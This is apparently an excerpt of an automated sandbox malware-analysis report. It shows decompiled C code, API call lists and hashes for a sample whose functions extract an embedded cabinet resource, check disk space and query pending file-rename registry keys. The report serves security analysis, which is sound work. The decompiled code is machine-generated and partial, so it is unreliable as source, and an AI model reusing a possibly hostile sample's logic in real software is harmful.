                                                                                                                                                                                                                                            						E010D44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E010D6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                            0x010d597d
                                                                                                                                                                                                                                            0x010d5988
                                                                                                                                                                                                                                            0x010d598f
                                                                                                                                                                                                                                            0x010d599a
                                                                                                                                                                                                                                            0x010d59a6
                                                                                                                                                                                                                                            0x010d59a8
                                                                                                                                                                                                                                            0x010d59af
                                                                                                                                                                                                                                            0x010d59b9
                                                                                                                                                                                                                                            0x010d59dd
                                                                                                                                                                                                                                            0x010d59e4
                                                                                                                                                                                                                                            0x010d59f1
                                                                                                                                                                                                                                            0x010d59fe
                                                                                                                                                                                                                                            0x010d5a0b
                                                                                                                                                                                                                                            0x010d5a13
                                                                                                                                                                                                                                            0x010d5a19
                                                                                                                                                                                                                                            0x010d5a1b
                                                                                                                                                                                                                                            0x010d5ba1
                                                                                                                                                                                                                                            0x010d5baf
                                                                                                                                                                                                                                            0x010d5bbd
                                                                                                                                                                                                                                            0x010d5bd8
                                                                                                                                                                                                                                            0x010d5bde
                                                                                                                                                                                                                                            0x010d5be3
                                                                                                                                                                                                                                            0x010d5bec
                                                                                                                                                                                                                                            0x010d5bf0
                                                                                                                                                                                                                                            0x010d5bfc
                                                                                                                                                                                                                                            0x010d5c02
                                                                                                                                                                                                                                            0x010d5c02
                                                                                                                                                                                                                                            0x010d5c02
                                                                                                                                                                                                                                            0x010d5c04
                                                                                                                                                                                                                                            0x010d5c04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5c04
                                                                                                                                                                                                                                            0x010d5a27
                                                                                                                                                                                                                                            0x010d5a3a
                                                                                                                                                                                                                                            0x010d5a46
                                                                                                                                                                                                                                            0x010d5a48
                                                                                                                                                                                                                                            0x010d5a4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5a64
                                                                                                                                                                                                                                            0x010d5a6a
                                                                                                                                                                                                                                            0x010d5a6c
                                                                                                                                                                                                                                            0x010d5abc
                                                                                                                                                                                                                                            0x010d5ac2
                                                                                                                                                                                                                                            0x010d5ac9
                                                                                                                                                                                                                                            0x010d5aca
                                                                                                                                                                                                                                            0x010d5aca
                                                                                                                                                                                                                                            0x010d5acc
                                                                                                                                                                                                                                            0x010d5acc
                                                                                                                                                                                                                                            0x010d5acf
                                                                                                                                                                                                                                            0x010d5ad1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5ad3
                                                                                                                                                                                                                                            0x010d5ad6
                                                                                                                                                                                                                                            0x010d5ad8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5ada
                                                                                                                                                                                                                                            0x010d5adc
                                                                                                                                                                                                                                            0x010d5add
                                                                                                                                                                                                                                            0x010d5add
                                                                                                                                                                                                                                            0x010d5ae0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5ae0
                                                                                                                                                                                                                                            0x010d5ae2
                                                                                                                                                                                                                                            0x010d5ae4
                                                                                                                                                                                                                                            0x010d5ae6
                                                                                                                                                                                                                                            0x010d5ae6
                                                                                                                                                                                                                                            0x010d5ae6
                                                                                                                                                                                                                                            0x010d5ae9
                                                                                                                                                                                                                                            0x010d5aeb
                                                                                                                                                                                                                                            0x010d5af0
                                                                                                                                                                                                                                            0x010d5af6
                                                                                                                                                                                                                                            0x010d5af8
                                                                                                                                                                                                                                            0x010d5af9
                                                                                                                                                                                                                                            0x010d5af9
                                                                                                                                                                                                                                            0x010d5afb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5afd
                                                                                                                                                                                                                                            0x010d5aff
                                                                                                                                                                                                                                            0x010d5b00
                                                                                                                                                                                                                                            0x010d5b03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5b03
                                                                                                                                                                                                                                            0x010d5b05
                                                                                                                                                                                                                                            0x010d5b08
                                                                                                                                                                                                                                            0x010d5b20
                                                                                                                                                                                                                                            0x010d5b27
                                                                                                                                                                                                                                            0x010d5b52
                                                                                                                                                                                                                                            0x010d5b52
                                                                                                                                                                                                                                            0x010d5b5b
                                                                                                                                                                                                                                            0x010d5b62
                                                                                                                                                                                                                                            0x010d5b6b
                                                                                                                                                                                                                                            0x010d5b6d
                                                                                                                                                                                                                                            0x010d5b76
                                                                                                                                                                                                                                            0x010d5b7d
                                                                                                                                                                                                                                            0x010d5b83
                                                                                                                                                                                                                                            0x010d5b7f
                                                                                                                                                                                                                                            0x010d5b7f
                                                                                                                                                                                                                                            0x010d5b7f
                                                                                                                                                                                                                                            0x010d5b6f
                                                                                                                                                                                                                                            0x010d5b72
                                                                                                                                                                                                                                            0x010d5b72
                                                                                                                                                                                                                                            0x010d5b85
                                                                                                                                                                                                                                            0x010d5b98
                                                                                                                                                                                                                                            0x010d5b9e
                                                                                                                                                                                                                                            0x010d5b87
                                                                                                                                                                                                                                            0x010d5b8f
                                                                                                                                                                                                                                            0x010d5b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5b85
                                                                                                                                                                                                                                            0x010d5b29
                                                                                                                                                                                                                                            0x010d5b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5b48
                                                                                                                                                                                                                                            0x010d5b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5b4a
                                                                                                                                                                                                                                            0x010d5b0f
                                                                                                                                                                                                                                            0x010d5b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5b16
                                                                                                                                                                                                                                            0x010d5a7c
                                                                                                                                                                                                                                            0x010d5a8a
                                                                                                                                                                                                                                            0x010d5aa5
                                                                                                                                                                                                                                            0x010d5aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d59bb
                                                                                                                                                                                                                                            0x010d59c0
                                                                                                                                                                                                                                            0x010d59c7
                                                                                                                                                                                                                                            0x010d59d1
                                                                                                                                                                                                                                            0x010d59d6
                                                                                                                                                                                                                                            0x010d5c05
                                                                                                                                                                                                                                            0x010d5c14
                                                                                                                                                                                                                                            0x010d5c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010D59A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 010D59AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010D5A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 010D5A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010D5A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 010D5A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010D5A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010D5AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010D5BFC
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: d0822e24ac5608404a3a36e22636b44bb45c0f40abfa437d6cbff72b107904b8
                                                                                                                                                                                                                                            • Instruction ID: 972995698ae11c8b85963d0a212d0b371adb78dbc3f3408b2c2ecebaa2ec8cf3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0822e24ac5608404a3a36e22636b44bb45c0f40abfa437d6cbff72b107904b8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4571A2B1A0131CAFEB269B68CC85BFA77BCEB48354F0440A9FD85D7144DA359E848F60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 374 10d4fe0-10d501a call 10d468f FindResourceA LoadResource LockResource 377 10d5161-10d5163 374->377 378 10d5020-10d5027 374->378 379 10d5029-10d5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 10d5057-10d505e call 10d4efd 378->380 379->380 383 10d507c-10d50b4 380->383 384 10d5060-10d5077 call 10d44b9 380->384 389 10d50e8-10d5104 call 10d44b9 383->389 390 10d50b6-10d50da 383->390 388 10d5107-10d510e 384->388 392 10d511d-10d511f 388->392 393 10d5110-10d5117 FreeResource 388->393 401 10d5106 389->401 400 10d50dc 390->400 390->401 396 10d513a-10d5141 392->396 397 10d5121-10d5127 392->397 393->392 398 10d515f 396->398 399 10d5143-10d514a 396->399 397->396 402 10d5129-10d5135 call 10d44b9 397->402 398->377 399->398 403 10d514c-10d5159 SendMessageA 399->403 405 10d50e3-10d50e6 400->405 401->388 402->396 403->398 405->389 405->401
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E010D4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0x10d9144 = E010D468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0x10d9140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 != 0) {
                                                                                                                                                                                                                                            					_t9 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            					if(_t9 != 0) {
                                                                                                                                                                                                                                            						ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            						ShowWindow(GetDlgItem( *0x10d8584, 0x841), 5); // executed
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t10 = E010D4EFD(0, 0); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						__imp__#20(E010D4CA0, E010D4CC0, E010D4980, E010D4A50, E010D4AD0, E010D4B60, E010D4BC0, 1, 0x10d9148, _t33);
                                                                                                                                                                                                                                            						_t34 = _t10;
                                                                                                                                                                                                                                            						if(_t34 == 0) {
                                                                                                                                                                                                                                            							L8:
                                                                                                                                                                                                                                            							_t24 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            							E010D44B9(_t24,  *0x10d9148 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							_t37 = 0;
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							goto L10;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__imp__#22(_t34, "*MEMCAB", 0x10d1140, 0, E010D4CD0, 0, 0x10d9140); // executed
                                                                                                                                                                                                                                            						_t37 = _t10;
                                                                                                                                                                                                                                            						if(_t37 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            						if(_t10 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t27 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            						E010D44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						_t12 =  *0x10d9140;
                                                                                                                                                                                                                                            						if(_t12 != 0) {
                                                                                                                                                                                                                                            							FreeResource(_t12);
                                                                                                                                                                                                                                            							 *0x10d9140 = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t37 == 0 &&  *0x10d91d8 == 0) {
                                                                                                                                                                                                                                            							E010D44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(( *0x10d8a38 & 0x00000001) == 0 && ( *0x10d9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            							SendMessageA( *0x10d8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						return _t37;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            0x010d4fe0
                                                                                                                                                                                                                                            0x010d4fe6
                                                                                                                                                                                                                                            0x010d4ff9
                                                                                                                                                                                                                                            0x010d500d
                                                                                                                                                                                                                                            0x010d5013
                                                                                                                                                                                                                                            0x010d501a
                                                                                                                                                                                                                                            0x010d5020
                                                                                                                                                                                                                                            0x010d5027
                                                                                                                                                                                                                                            0x010d5037
                                                                                                                                                                                                                                            0x010d5051
                                                                                                                                                                                                                                            0x010d5051
                                                                                                                                                                                                                                            0x010d5057
                                                                                                                                                                                                                                            0x010d505e
                                                                                                                                                                                                                                            0x010d50a7
                                                                                                                                                                                                                                            0x010d50ad
                                                                                                                                                                                                                                            0x010d50b4
                                                                                                                                                                                                                                            0x010d50e8
                                                                                                                                                                                                                                            0x010d50ee
                                                                                                                                                                                                                                            0x010d50ff
                                                                                                                                                                                                                                            0x010d5104
                                                                                                                                                                                                                                            0x010d5106
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5106
                                                                                                                                                                                                                                            0x010d50cd
                                                                                                                                                                                                                                            0x010d50d3
                                                                                                                                                                                                                                            0x010d50da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d50dd
                                                                                                                                                                                                                                            0x010d50e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5060
                                                                                                                                                                                                                                            0x010d5060
                                                                                                                                                                                                                                            0x010d5070
                                                                                                                                                                                                                                            0x010d5075
                                                                                                                                                                                                                                            0x010d5107
                                                                                                                                                                                                                                            0x010d5107
                                                                                                                                                                                                                                            0x010d510e
                                                                                                                                                                                                                                            0x010d5111
                                                                                                                                                                                                                                            0x010d5117
                                                                                                                                                                                                                                            0x010d5117
                                                                                                                                                                                                                                            0x010d511f
                                                                                                                                                                                                                                            0x010d5135
                                                                                                                                                                                                                                            0x010d5135
                                                                                                                                                                                                                                            0x010d5141
                                                                                                                                                                                                                                            0x010d5159
                                                                                                                                                                                                                                            0x010d5159
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d515f
                                                                                                                                                                                                                                            0x010d505e
                                                                                                                                                                                                                                            0x010d5163

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010D4FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 010D5006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 010D500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 010D5030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 010D5037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 010D504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 010D5051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(?,00000000,00000010,00000000), ref: 010D5111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010D5159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: f40f82768275516213b22594c4d198e6667e0f6dcef67a6f321cada8239acd5b
                                                                                                                                                                                                                                            • Instruction ID: 3b12bff3ac5644cfe2af12a8984bee31e9dea1774172b812a3f7b647d7de8505
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f40f82768275516213b22594c4d198e6667e0f6dcef67a6f321cada8239acd5b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53310A74741312BBE7305A7AEC89F673ABCA748755F044019FDC1E7589DABE8C408760
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 462 10d256d-10d257d 463 10d2583-10d2589 462->463 464 10d2622-10d2627 call 10d24e0 462->464 466 10d25e8-10d2607 RegOpenKeyExA 463->466 467 10d258b 463->467 471 10d2629-10d262f 464->471 468 10d2609-10d2620 RegQueryInfoKeyA 466->468 469 10d25e3-10d25e6 466->469 467->471 472 10d2591-10d2595 467->472 473 10d25d1-10d25dd RegCloseKey 468->473 469->471 472->471 474 10d259b-10d25ba RegOpenKeyExA 472->474 473->469 474->469 475 10d25bc-10d25cb RegQueryValueExA 474->475 475->473
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E010D256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E010D24E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x010d2572
                                                                                                                                                                                                                                            0x010d2573
                                                                                                                                                                                                                                            0x010d2575
                                                                                                                                                                                                                                            0x010d2578
                                                                                                                                                                                                                                            0x010d257d
                                                                                                                                                                                                                                            0x010d2627
                                                                                                                                                                                                                                            0x010d2583
                                                                                                                                                                                                                                            0x010d2586
                                                                                                                                                                                                                                            0x010d2589
                                                                                                                                                                                                                                            0x010d25eb
                                                                                                                                                                                                                                            0x010d2607
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2609
                                                                                                                                                                                                                                            0x010d261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d261a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d258b
                                                                                                                                                                                                                                            0x010d258b
                                                                                                                                                                                                                                            0x010d259e
                                                                                                                                                                                                                                            0x010d25b2
                                                                                                                                                                                                                                            0x010d25ba
                                                                                                                                                                                                                                            0x010d25cb
                                                                                                                                                                                                                                            0x010d25d1
                                                                                                                                                                                                                                            0x010d25d6
                                                                                                                                                                                                                                            0x010d25da
                                                                                                                                                                                                                                            0x010d25dd
                                                                                                                                                                                                                                            0x010d25dd
                                                                                                                                                                                                                                            0x010d25e3
                                                                                                                                                                                                                                            0x010d25e3
                                                                                                                                                                                                                                            0x010d25e3
                                                                                                                                                                                                                                            0x010d258b
                                                                                                                                                                                                                                            0x010d2589
                                                                                                                                                                                                                                            0x010d262f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,?,010D4096,010D4096,?,010D1ED3,00000001,00000000,?,?,010D4137,?), ref: 010D25B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010D4096,?,010D1ED3,00000001,00000000,?,?,010D4137,?,010D4096), ref: 010D25CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,010D1ED3,00000001,00000000,?,?,010D4137,?,010D4096), ref: 010D25DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,?,010D4096,010D4096,?,010D1ED3,00000001,00000000,?,?,010D4137,?), ref: 010D25FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010D4096,00000000,00000000,00000000,00000000,?,010D1ED3,00000001,00000000), ref: 010D261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 010D25C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 010D25A8
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010D25F5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
